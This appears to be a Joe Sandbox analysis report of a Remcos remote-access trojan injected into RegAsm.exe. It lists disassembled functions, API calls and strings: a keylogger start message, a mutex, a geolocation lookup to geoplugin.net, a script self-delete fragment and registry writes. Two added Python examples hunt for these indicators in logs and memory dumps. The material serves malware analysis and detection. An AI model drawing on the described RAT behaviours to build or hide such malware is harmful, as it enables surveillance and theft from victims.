                                                                 [Graph summary: 41b411-41b454 (calls 4020df, 43bda0) calls InternetOpenW and InternetOpenUrlW; 41b456-41b477 calls InternetReadFile, then 41b479-41b499 (calls 4020b7, 403376, 401fd8) and 41b49d-41b4a4 either loop back to the InternetReadFile block or fall through to 41b4a6-41b4b3, which calls InternetCloseHandle twice and 43bd9b; the function returns at 41b4b8-41b4c2.]
                                                                APIs
                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                Strings
                                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                • String ID: http://geoplugin.net/json.gp
                                                                • API String ID: 3121278467-91888290
                                                                • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
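The routine above fetches http://geoplugin.net/json.gp through WinINet (InternetOpenW with a NULL agent string as its first argument, InternetOpenUrlW with the URL, then InternetReadFile in a loop), and in this report that code runs inside RegAsm.exe. As an added example that is not part of the report or of the sample, the Python below hunts for that request in a proxy or EDR export. The tab-separated log format and its column order, the browser allow-list and the sample lines are assumptions constructed for the demo; the empty User-Agent check assumes that the NULL agent string produces a request with no User-Agent header, which the listing suggests but does not prove.

```python
"""Flag geoplugin.net lookups from non-browser processes in proxy/EDR logs.

Added example, not Joe Sandbox or Remcos code. The log format is an
assumption: one event per line, tab-separated as
    <timestamp> <host> <process> <url> <user-agent>
Adapt parse_line() to the export you actually have.
"""
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlsplit

# URL passed to InternetOpenUrlW in this report.
GEOPLUGIN_HOST = "geoplugin.net"
GEOPLUGIN_PATH = "/json.gp"

# Processes for which a geolocation lookup is unsurprising (assumption).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}


@dataclass(frozen=True)
class Event:
    ts: str
    host: str
    process: str
    url: str
    user_agent: str


@dataclass(frozen=True)
class Finding:
    event: Event
    reasons: List[str]


def parse_line(line: str) -> Optional[Event]:
    """Parse one tab-separated event; return None for malformed lines."""
    fields = line.rstrip("\n").split("\t")
    if len(fields) != 5:
        return None
    return Event(*fields)


def is_geoplugin(url: str) -> bool:
    """Match host and path exactly so look-alike hosts do not count."""
    parts = urlsplit(url)
    return parts.hostname == GEOPLUGIN_HOST and parts.path == GEOPLUGIN_PATH


def assess(ev: Event) -> Optional[Finding]:
    """Return a Finding when the geoplugin request looks like tooling, not a user."""
    if not is_geoplugin(ev.url):
        return None
    reasons = []
    proc = ev.process.lower()
    if proc not in BROWSERS:
        reasons.append(f"non-browser process {ev.process}")
    # The dumped code in this report lives in RegAsm.exe, a .NET build
    # utility that has no reason to geolocate the host.
    if proc == "regasm.exe":
        reasons.append("known Remcos injection target RegAsm.exe")
    # Assumption: a NULL agent string to InternetOpenW yields no User-Agent,
    # which this export represents as "-" or an empty field.
    if ev.user_agent in ("", "-"):
        reasons.append("empty User-Agent")
    return Finding(ev, reasons) if reasons else None


def hunt(lines: List[str]) -> List[Finding]:
    """Run assess() over raw log lines, skipping anything that fails to parse."""
    findings = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        finding = assess(ev)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample export; none of these lines come from the report.
SAMPLE_LOG = [
    "2024-10-14T09:12:01Z\tWS-0412\tchrome.exe\thttp://geoplugin.net/json.gp\tMozilla/5.0",
    "2024-10-14T09:12:05Z\tWS-0412\tRegAsm.exe\thttp://geoplugin.net/json.gp\t-",
    "2024-10-14T09:12:09Z\tWS-0412\tRegAsm.exe\thttp://example.com/\t-",
    "2024-10-14T09:13:00Z\tWS-0207\tpowershell.exe\thttp://geoplugin.net/json.gp\t-",
    "malformed line",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f.event.ts} {f.event.host} {f.event.process}: {'; '.join(f.reasons)}")
```

The browser allow-list is deliberately small: the point is that the request itself is weak evidence, and the process context (RegAsm.exe, a script host, an Office binary) is what turns it into a lead worth pivoting on.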

                                                                 Control-flow Graph
                                                                 [Graph summary: 41c482-41c493, then one of 41c49a-41c49f, 41c4a1-41c4a9 or 41c4ab-41c4b2, then 41c4b3-41c4cc calls CreateFileW. From there 41c4ce-41c4d0 goes straight to the return at 41c510-41c515, while 41c4d2-41c4d7 either calls SetFilePointer at 41c4d9-41c4e7 (one edge of which goes through 41c4e9-41c4f0, calling CloseHandle, to the return) or proceeds to WriteFile at 41c4f2-41c503; 41c507-41c50e calls CloseHandle before the return.]
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                • String ID: xpF
                                                                • API String ID: 1852769593-354647465
                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                APIs
                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                  • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                                                  • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                  • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                  • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                • API String ID: 782494840-2070987746
                                                                • Opcode ID: 697c2019ecc49fbbbeb48104f1224f3a46b5ec4160ceda2913ffea691057c52c
                                                                • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                • Opcode Fuzzy Hash: 697c2019ecc49fbbbeb48104f1224f3a46b5ec4160ceda2913ffea691057c52c
                                                                • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE
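The strings in the function listings above are enough for a first-pass triage of a process dump: the connection and TLS messages at the connect routine, the idle banner of the foreground-window monitor, the geoplugin.net URL, the fso.DeleteFile(Wscript.ScriptFullName) fragment handed to the file-writing routine, and the SOFTWARE\Microsoft\Windows NT\CurrentVersion key of the OS-fingerprint routine. The following Python is an added example written for this page, not Joe Sandbox or Remcos code. It searches a dump for those strings in both ASCII and UTF-16LE, because the sample calls the W variants of the Win32 APIs and most of these strings therefore sit in memory as wide characters, which a plain ASCII `strings` pass misses. The dump it scans is constructed inline, and the three-indicator threshold is an assumption.

```python
"""Triage a memory dump for the Remcos strings listed in this report.

Added example, not Joe Sandbox or Remcos code. The indicator strings are
copied from the function listings above; the sample dump is constructed.
"""
from dataclasses import dataclass
from typing import Dict, Iterator, List

# Strings recovered from the RegAsm.exe 0x400000 image in this report.
INDICATORS: Dict[str, str] = {
    "tls_handshake": "TLS Handshake...",
    "tls_auth_failed": "TLS Authentication Failed",
    "connection_refused": "Connection Refused",
    "idle_banner": "User has been idle for",
    "geoplugin_url": "http://geoplugin.net/json.gp",
    "self_delete_vbs": "fso.DeleteFile(Wscript.ScriptFullName)",
    "os_version_key": "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion",
}

# The sample uses the W (wide) APIs for most of these, so search both forms.
ENCODINGS = ("ascii", "utf-16-le")


@dataclass(frozen=True)
class Hit:
    name: str
    encoding: str
    offset: int


def _find_all(blob: bytes, needle: bytes) -> Iterator[int]:
    """Yield every non-overlapping offset of needle in blob."""
    pos = blob.find(needle)
    while pos != -1:
        yield pos
        pos = blob.find(needle, pos + len(needle))


def scan(blob: bytes) -> List[Hit]:
    """Return every indicator occurrence, in either encoding, sorted by offset."""
    hits = []
    for name, text in INDICATORS.items():
        for enc in ENCODINGS:
            for off in _find_all(blob, text.encode(enc)):
                hits.append(Hit(name, enc, off))
    return sorted(hits, key=lambda h: h.offset)


def verdict(hits: List[Hit], threshold: int = 3) -> str:
    """Classify by distinct indicators, not raw hit count.

    The threshold is an assumption for this example: a lone
    'Connection Refused' is generic, but several of these strings together
    match the feature set documented in this report.
    """
    distinct = {h.name for h in hits}
    if len(distinct) >= threshold:
        return f"remcos-like ({len(distinct)} indicators: {', '.join(sorted(distinct))})"
    if distinct:
        return f"weak ({len(distinct)} indicator(s))"
    return "clean"


def build_sample_dump() -> bytes:
    """Constructed stand-in for a process dump: filler plus embedded strings."""
    filler = b"\x00" * 64
    parts = [
        b"MZ" + filler,
        INDICATORS["geoplugin_url"].encode("utf-16-le"), filler,
        INDICATORS["tls_handshake"].encode("utf-16-le"), filler,
        INDICATORS["idle_banner"].encode("utf-16-le"), filler,
        # This one is written into a dropped .vbs, so keep it narrow (ASCII).
        INDICATORS["self_delete_vbs"].encode("ascii"), filler,
    ]
    return b"".join(parts)


if __name__ == "__main__":
    dump = build_sample_dump()
    for h in scan(dump):
        print(f"{h.offset:#08x} {h.encoding:9s} {h.name}")
    print(verdict(scan(dump)))
```

Run it against a real dump by passing the file's bytes to scan(); the offsets it prints can be fed straight back into the disassembler to land on the string references shown in the listings above.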
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                                • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
                                                                  • Part of subcall function 1000C803: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                                  • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
                                                                Similarity
                                                                • API ID: AddressHandleModuleProcProtectVirtual
                                                                • String ID:
                                                                • API String ID: 2099061454-0
                                                                • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                                • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                                APIs
                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                 • Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                • String ID: XQG
                                                                • API String ID: 1958988193-3606453820
                                                                • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
APIs
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
  • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
  • Part of subcall function 1000C7E6: GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
  • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
Memory Dump Source
• Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
APIs
• GetProcAddress.KERNEL32(00000000,1000C7F4), ref: 1000C804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
• GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 1000C860
Memory Dump Source
• Source File: 0000000B.00000002.4475206762.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000B.00000002.4475172260.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4475206762.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_RegAsm.jbxd
Similarity
• API ID: AddressProcProtectVirtual$HandleModule
• String ID:
• API String ID: 2152742572-0
• Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
• Instruction ID: 9138b94afbcae90e12a8614b592989542e7cb6e8cba5f1d72008c399686a5f74
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CountEventTick
• String ID: !D@$NG
• API String ID: 180926312-2721294649
• Opcode ID: 2a410f87322cb94261a9b433236618fb05d81dc4902db218ff2d8141d0bfa05a
• Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
APIs
• CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
• CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
• CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
  • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
  • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateThread$LocalTimewsprintf
• String ID: Offline Keylogger Started
• API String ID: 465354869-4114347211
• Opcode ID: e9faa5e414620fc96257d4712bcffae5cc82c2583e5401c4a4641fe0a8bebe8a
• Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
APIs
• RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
• RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,004752F0,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137E1
• RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.1.1 Pro), ref: 004137EC
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseCreateValue
• String ID: pth_unenc
• API String ID: 1818849710-4028850238
• Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
• Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
• CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
• CloseHandle.KERNEL32(00000000,?,00000000), ref: 00404DDB
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• String ID:
• API String ID: 3360349984-0
• Opcode ID: b1d94ccb09ae88335c98018fba1659fd9f6643181a77e83682c5dcad394a06c0
• Instruction ID: 30d48123e17294c38ae6f490953f1b42a5ca81467cb0df1087f173bd09261e59
APIs
• CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
• GetFileSize.KERNEL32(00000000,00000000), ref: 0041C543
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C568
• CloseHandle.KERNEL32(00000000), ref: 0041C576
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
• Opcode ID: eaf6ed3f63b4403b43378431095bcec12dbe7b76bb0b9555606dcebd0a0bb3a0
• Instruction ID: 4673af35f3eeaf13de89ae80f5e83caf65f56e40ae5cb47f4621101913e6d1ef
APIs
• CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
• GetLastError.KERNEL32 ref: 0040D0BE
Strings
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CreateErrorLastMutex
• String ID: Rmc-I89M3S
• API String ID: 1925916568-1227342801
• Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
• Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
APIs
• send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
• WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
• SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: EventObjectSingleWaitsend
• String ID:
• API String ID: 3963590051-0
• Opcode ID: b1d66744df5c6cb587348be29f4f2b73cfa97db57556f8ad38e66ecf600c3840
• Instruction ID: ade4869c8039bafc3f5202e75afdfb18787be874a76dce876c460fae4797ad88
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00413622
• RegCloseKey.KERNEL32(?), ref: 0041362D
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
• Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
• RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
• RegCloseKey.KERNEL32(00000000), ref: 00413773
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 16fdc48d36bb649990d7f6d81c9afeb312c2f40a16629baa57fa9ba92c9a975a
• Instruction ID: cdc8bb2f12cdea1da97e3e4d454c68039a4c25ad8704162e95ac064a0ac82555
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 0044F461
• _free.LIBCMT ref: 0044F49A
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F4A1
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: EnvironmentStrings$Free_free
• String ID:
• API String ID: 2716640707-0
• Opcode ID: 529e42a1fa36a4ac6123fcdb0dfb42304a8dc5a6142a13bb334c2dd4b346bc22
• Instruction ID: 0fde98e0ac238faa149cd6f420f555edc5ad685e5938876998fddc3cfa248eb7
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 004135C2
• RegCloseKey.KERNEL32(?), ref: 004135CD
Memory Dump Source
• Source File: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.4469156040.0000000000474000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000B.00000002.4469156040.0000000000478000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
Yara matches
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
• Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                APIs
